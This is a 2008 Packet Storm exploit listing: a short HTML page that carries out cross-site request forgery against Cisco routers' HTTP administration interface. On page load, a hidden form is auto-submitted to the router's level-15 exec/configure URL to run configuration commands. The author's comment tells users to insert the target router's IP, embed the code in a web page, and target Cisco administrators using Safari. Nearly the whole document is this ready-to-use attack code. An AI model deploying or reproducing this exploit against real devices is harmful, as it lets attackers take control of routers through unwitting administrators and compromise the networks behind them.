ciscOWN2.txt

2008-09-17T00:00:00
ID PACKETSTORM:70059
Type packetstorm
Reporter Jeremy Brown
Modified 2008-09-17T00:00:00

Description

                                        
                                            `<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]  
Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2  
Replace "10.10.10.1" with the IP address of the target router, embed this in a web  
page and hope for the best. Cisco Admin's + Safari are the best targets ;) -->  
  
  
<html>  
<body>  
  
<body onload="fdsa.submit();">  
  
  
  
<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">  
  
<input type=hidden name=command value="alias exec xx xx">  
  
  
  
<input type=hidden name=command_url value="/level/15/exec/-">  
<input type=hidden name=new_command_url value="/level/15/configure/-">  
  
</body>  
</html>`